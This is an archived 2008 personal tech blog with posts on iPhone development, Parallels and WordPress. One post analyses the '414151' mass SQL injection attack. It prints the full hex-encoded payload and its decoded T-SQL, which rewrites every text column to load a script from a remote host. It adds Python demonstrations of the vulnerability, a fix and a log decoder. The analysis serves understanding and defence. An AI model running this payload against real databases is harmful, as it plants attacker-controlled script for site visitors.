Archive for the 'soul' Category
Go for your whims.
September 2nd, 2008
In my post-TPR (The Princeton Review) - trying to figure out what I want to do state of mind I decided to do something a little different. All of us get whims and in most cases, at least with myself, I tend to be all talk. Lately, with a sort of "nothing to lose" attitude I decided to attempt to follow through with some of my whims. One of these whims stemmed from my fan-boy status of a particular tech celebrity Leo Laporte. I have been listening to his podcasts for years and watched him on TechTV before they went kaput. I have always admired him and been amazed by his overall knowledge of not only the history of technology but all things new and cool.
So here is the beginning of the story. I sent Leo a simple email volunteering my time for a week, where I would fly out to Petaluma and intern for him. I truly didn’t care what I did for him. Be it washing his car, making coffee or something more useful like help with his websites.
To mitigate my barrier to entry I told him I would pay for all my own expenses. A couple weeks later I got a message back from Mara, Leo’s email person. She told me that she would pass my email over to Leo. To be clear she told me that he reads all of his email eventually. To my huge delight, I was soon contacted by Leo who extended the invitation to visit him.
I am planning on going to Petaluma on Sept. 15-18.
Let’s hear it for our whims. More to come…
Parallels, full screen and multiple monitors - No worky
August 28th, 2008
This is just another tidbit of info that I have come across through my adventures with Parallels support. In my venture to fully utilize my new baby (Mac Pro beast) I really wanted to be able to take advantage of my three monitors. Unfortunately, it turns out that Parallels doesn’t support multiple monitors in full screen mode. It does seem able to utilize multiple monitors when using coherence (able to drag an application to another monitor), however that isn’t how I roll. I have been informed by Parallels support that this will be "fixed" in an upcoming version.
A word about Parallels support. If you are willing to pay to get your simple question answered they are quite helpful and the process is straightforward and fast. If you take the free route, expect it to take a week. That said - I got my answer.
WordPress Permissions - what should they be? Really!
August 25th, 2008
I am coming to the quick realization that some WordPress (2.6) features, some that I am very used to, others that are new to 2.6, won’t work if the permissions on directories and files aren’t set correctly. After some lengthy Googling, what "correct" is seems to be anyone’s guess based on what OS, webserver, WP version, plugin or theme you happen to be running.
So here is my question:
What should the permissions be on every directory and file within a WordPress 2.6 installation for the application to work as intended?
I would really like to hear from everyone - the community at large as well as those close to the WordPress development. But at the end of the day, I would appreciate hearing from an official source.
Update: I got some feedback…wordpress.org/support/topic/199164
Mac Pro, Parallels, Blue Screen of Death - nuff said
August 6th, 2008
Just a quick post so that this information gets out onto the interweb somehow. It cost me $30 but I am willing to share this info for free since Parallels isn’t.
Now this could be my own ignorance but I had a problem and it just wasn’t obvious to me what was causing it.
I have a new Mac, installed Parallels with Vista Ultimate (bootcamp partition). Was working sweet! Not surprisingly, after a while the VM would pause due to lack of activity. Upon Resume, Vista would blue screen. I found many references to this problem when I googled it, but no good solutions.
So I ended up emailing Parallels support a couple times to no avail. I got no response; I really don’t believe their system works. I then called Parallels phone support and paid my money.
Turns out - DOH - that it was Vista that was going to sleep first (power settings) which was causing the VM to Pause. After changing my settings to not sleep or hibernate -> all is well.
The Blue Screen is still a bug they need to fix, but I can live with this solution. Also if you want things to sleep do it through the Mac side.
iPhone Take 2
July 16th, 2008
So here we go again. I am going to give it one more try. But I am glad to say things are looking up. I managed to acquire the new device yesterday after a long grueling day in line in the hot sun. See my Twitter for the play by play. I ended up having a huge argument over the phone with AT&T customer service in the middle of the Apple Store. From my other posts on this blog the story goes something like this. I bought the old iPhone, transferred my service to AT&T from Verizon, then when the 3G was announced (rumored) I went back to the AT&T store to figure out the best way to get on the new phone. I ended up returning the iPhone, getting this little crappy, free, refurbished Nokia to hold me over. I was going to go back to Verizon but the sales people assured me that everything would work out and that I should stay with AT&T. And I did.
Turns out I was NOT eligible for the incentive price on the new iPhone and that’s where the argument started. Of course back then we had no idea what type of pricing models or incentives AT&T would offer - but that’s not the point. In the end, I wound up buying the new iPhone from the Apple Store because pretty much everyone else in the NJ/NY area was sold out and I was being told that they wouldn’t be replenished for 20+ days. Even the Apple Store’s assistant manager got on the phone with AT&T Customer Service to make my case. Really, they made the wrong decision and unless something changes I will feel pretty screwed. BUT, I am holding my judgement. This morning I went back to the original AT&T store to allow them to make things right. Manager wasn’t there so the jury is out. So we’ll see.
I have only used the phone for a few hours but so far I have really enjoyed the experience. Very clean, fast and predictable. Few bullets:
- The sound quality seems better.
- The phone is still pretty peppy but I am seeing a drag when multiple things are going on
- 3G is very noticeable and the Wifi seems faster too
- The iTunes upgrade went nicely and the phone synched perfectly. I still don’t understand why iTunes makes you authorize the computer you use to download stuff. Had to do that for the apps to synch.
- Besides the authorization issue (2 mins to solve) the apps synched perfectly
- I haven’t hooked up the email yet so I have no idea if the "push" is working yet. Loved Apple’s note today. "We really didn’t mean push"
On another good note I was finally approved for the developer program. I can now write applications AND put them on the phone. I haven’t tried it yet, but I am looking forward to it.
The MacArthur Manifesto
July 1st, 2008
MacArthur Manifesto
While recently listening to an edition of the Net@Night podcast, Amber MacArthur introduced a new segment of the show called Beef of the Week. She explained that she has basically been shut out of her Facebook account for months now. Turns out that she has too many friend requests and the Facebook platform cannot handle it. She is prevented from logging in and accepting the thousands of friend requests she has received. When she reached out to Facebook their answer was basically that there was nothing they could do and that she might try deleting all of the people that were attempting to befriend her. Not very social. Now Amber is kind of a Social Network poster child in that she dedicates most of her time promoting social media and networking and believes that the web is the best place to form communities. Seems to me that building their platform for and supporting users like Amber is in Facebook’s own best interest.
We use social networks like Facebook for many reasons. Most people use it as a place where they can keep up with their friends no matter where they are. But we are also seeing more and more groups being formed that relate to causes and charities. These are very important communities and networks like Facebook become more relevant as they host and support them. I spend a good part of my day thinking about how to promote organized social networks. The questions I ask myself include what tools or mechanisms are best for a particular social network. This typically boils down to a feature set and target demographic. NOW I am thinking I have to also consider if the platform can handle the load.
Should I create social networks on Facebook knowing they may not be able to handle it if it becomes popular?
User loyalty of Social Network websites has proven over time to be fickle. For the most part users go where their friends are. However, as we have seen in the past - my friends used to be at MySpace and now they are at Facebook. In a couple months they could be somewhere else. My main point is that if Facebook as a platform can’t handle the vast numbers of people who flock to these types of communities they will fail and the users will go someplace else.
The Mission: To use Facebook against themselves. We must convince Facebook to fix their platform and to support people like Amber so we can continue to build important social communities. Maybe we should create a "Free Amber" Facebook Fan page.
Returned meself an iPhone!
April 23rd, 2008
Yup, had enough. So three major reasons:
- Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment. (See my other posts on the subject)
- New 3G iPhone is strongly rumored to be coming out in the summer
- Email is just painful. Yahoo push mail is a joke. I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE. My hope is that the 3G iPhone will have a chance of having productive like email capabilities.
My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then come this summer upgrade to a new iPhone 2.0 with 3G. The rumors are also that the developer program will open up after the SDK is officially released.
My appreciation to the ATT store at 78th and Broadway for being so nice and understanding.
Apple: iPhone Developer Program on Hold. Barry: You Mother @#*)%$’s
April 22nd, 2008
Sorry, but I am still steamed over the whole Developer program. Needed just one more rant about it…
Well, talk about taking the wind out of your sails.
Watch the momentum grow:
- I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
- Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
- Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
- Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
- Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
- Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
- Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
- Switch the target from simulator to device - What does it mean "provision"?
So until they open back up the Developer program, which is another friggin $100 I am more than willing to pay, I can’t "provision" my friggin iPhone.
OY. Maybe the chicks will dig the simulator? Hold on while I compile….
More info:
http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/
http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/
http://twitter.com/danielpunkass/statuses/771541151
http://twitter.com/davidweiss/statuses/771549002
http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/
Got meself an iPhone
April 18th, 2008
So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that.
But it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought myself an iPhone.
According to Mossberg that was probably a mistake and probably a bigger one than I realized. He thinks the 3G version is coming out in June. My bad was that I didn’t realize that in order to actually install the programs you write with the SDK on to your device it needs to be "provisioned". Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this. Anyway, I can’t get provisioned until I am accepted into the developer program and pay my $99. And at the moment they are not accepting applications:
Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.
I hope to keep writing about my experience, but for now. See ya.
SQL Injection is cool
April 18th, 2008
Overview
So seeing sites hacked is pretty cool unless it’s one of yours. I kinda look at hacking as the end-all-be-all of elite programming. Of course, the intent isn’t always good, but the techniques are artful. I most recently witnessed an impressive SQL Injection hack on a website. I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack", which appears to be the same code just implemented a little differently. Of course anyone who has been hacked by this code will recognize these numbers. As far as SQL Injection attacks go, this one seems to have taken a systematic approach. I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that. I will list some references at the end.
The Details
There were a couple things that impressed me about this particular hack.
- The outcome was that the hack code appended a <script> tag with a reference URL to every text-type column (varchar, nvarchar, text and ntext) of every user table in the database. The site was running .Net and IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server: it walks the sysobjects and syscolumns system tables and drives a cursor with @@FETCH_STATUS. That said, don’t fool yourself into thinking that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices. Specifically, building SQL statements by concatenating user input into a string inside the code instead of passing it as a parameter, which could occur on any (most) platform, language or database. The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve. It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
- The second thing that impressed me was the actual code that executed this varchar manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
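An added example (not code from the original post or from the hacked site) of the bad practice the first bullet blames, beside the fix. It uses an in-memory sqlite database in place of SQL Server 2000, with constructed sample rows and a constructed payload modelled on the 414151 statement; `executescript()` stands in for a database driver that runs every statement it is handed, which is the stacked-query behaviour this attack depends on. sqlite concatenates strings with `||` where T-SQL uses `+`.

```python
import sqlite3

# Constructed sample payload in the shape of the 414151 hack: the input
# closes the intended statement, then appends one that tags every row.
INJECTED_TAG = "<script src=http://www.414151.com/fjp.js></script>"
MALICIOUS_ID = "1; UPDATE products SET name = name || '" + INJECTED_TAG + "'"


def fresh_db():
    """In-memory database with constructed sample rows (not real site data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, views INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, 0)", [(1, "Widget"), (2, "Gadget")]
    )
    conn.commit()
    return conn


def count_view_vulnerable(conn, product_id):
    """The pattern the post blames: SQL assembled by string concatenation.

    executescript() runs every statement in the string, so the attacker's
    second UPDATE executes with the application's database privileges.
    """
    sql = "UPDATE products SET views = views + 1 WHERE id = " + product_id
    conn.executescript(sql)
    conn.commit()


def count_view_hardened(conn, product_id):
    """Fixed version: validate the type, then bind the value as a parameter.

    A bound parameter is sent as data, never parsed as SQL, and the int()
    conversion rejects '1; UPDATE ...' before the database is even reached.
    """
    pid = int(product_id)  # raises ValueError on the malicious input
    conn.execute("UPDATE products SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()


def names(conn):
    """Current product names, in id order."""
    return [row[0] for row in conn.execute("SELECT name FROM products ORDER BY id")]


def demo():
    """Run the same malicious input through both code paths.

    Returns (names after the vulnerable path, whether the hardened path
    rejected the input, names after the hardened path).
    """
    victim = fresh_db()
    count_view_vulnerable(victim, MALICIOUS_ID)
    tainted = names(victim)  # every name now ends with the script tag

    fixed = fresh_db()
    try:
        count_view_hardened(fixed, MALICIOUS_ID)
        rejected = False
    except ValueError:
        rejected = True
    return tainted, rejected, names(fixed)


if __name__ == "__main__":
    print(demo())
```

The point of the comparison is that the hardened path does not try to filter or escape the input; it changes how the value reaches the database, which is the only fix that holds up when the attacker's payload is hex-encoded and unrecognizable to a blacklist.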
The Possibilities
The possibilities of this hack scare me (and impress me). When I started searching around the web for this 414151 script I found a good number of references. Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also. I list one link below of an article that talks about it quite a lot. According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.
It is quite frightening when you think of such an effective and widespread hack that is basically designed to "phone home": every visitor’s browser fetches and executes whatever JavaScript the attacker chooses to serve from that URL, so the payload can be switched on or changed any time the author decides to turn on his website (a synchronized attack scenario). …well…I think it would have made the news.
The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
The SQL Statement
DECLARE @T varchar(255),@C varchar(255)
-- cursor over every text-type column of every user table (xtype 'u'):
-- 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- dynamic SQL appends the script tag to the current value of the column;
  -- convert(varchar,...) with no length defaults to 30 characters, so any
  -- longer value is truncated before the tag is added (the '' is an
  -- escaped single quote inside the exec string)
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.414151.com/fjp.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
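An added example, not part of the original post: a decoder for the hexadecimal form shown above, of the kind you would run over web server logs to see what was actually sent. The blob is the statement’s UTF-16LE encoding (two bytes per character, low byte first, so 4400 is "D" and 4500 is "E"), which is what a T-SQL CAST(... AS NVARCHAR) turns back into executable text. The constructed log line below assumes the delivery wrapper commonly reported for these attacks, DECLARE @S NVARCHAR(4000);SET @S=CAST(0x... AS NVARCHAR(4000));EXEC(@S); that wrapper is not shown on this page and is an assumption here, and the statement hidden inside the sample is a shortened version of the one above.

```python
import re
from urllib.parse import unquote

# CAST(0x... AS NVARCHAR(4000)) / CAST(0x... AS VARCHAR(...)) in decoded text
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=['\"]?([^'\"\s>]+)", re.IGNORECASE)


def decode_hex_sql(hex_digits):
    """Turn a hex blob into the T-SQL it hides.

    NVARCHAR payloads are UTF-16LE (4400 = 'D'); if the byte count is odd or
    the data is not valid UTF-16, fall back to an 8-bit decode for the
    VARCHAR variants of the same attack.
    """
    raw = bytes.fromhex(hex_digits)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def extract_payloads(log_line):
    """Return every decoded CAST(0x...) statement found in a request line."""
    text = unquote(log_line)  # IIS logs keep the query string URL-encoded
    return [decode_hex_sql(h) for h in HEX_CAST.findall(text)]


def injected_script_urls(statement):
    """The remote script URLs a decoded statement would plant in the database."""
    return SCRIPT_SRC.findall(statement)


# Constructed sample: a shortened version of the statement on this page,
# hex-encoded the way the attacker's generator would (UTF-16LE, uppercase hex).
SAMPLE_HIDDEN = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://www.414151.com/fjp.js></script>''')"
)
SAMPLE_HEX = SAMPLE_HIDDEN.encode("utf-16-le").hex().upper()

# Constructed log line (assumed wrapper, not taken from this page's logs).
SAMPLE_LOG_LINE = (
    "2008-04-18 12:00:00 GET /products.aspx id=1;DECLARE%20@S%20NVARCHAR(4000);"
    "SET%20@S=CAST(0x" + SAMPLE_HEX + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200"
)

if __name__ == "__main__":
    for stmt in extract_payloads(SAMPLE_LOG_LINE):
        print(stmt)
        print("plants:", injected_script_urls(stmt))
```

Grepping logs for `CAST(0x` (or its URL-encoded form `CAST(0x` with `%20` around it) finds the requests; the decoder then tells you which table types were targeted and which domain to block and search the database for.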
Other references
- http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html - this great article dives deep into the general attack.
- http://www.webhostingtalk.com/showthread.php?t=686032
- http://en.wikipedia.org/wiki/SQL_injection
- http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Update (4/29)…
This one keeps going and going.
- http://hackademix.net/2008/04/26/mass-attack-faq/#comment-7742 - another great article talking about this specific attack
- http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/
- http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html
I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks. I didn’t mention this earlier because this is inherent in all SQL Injection attacks.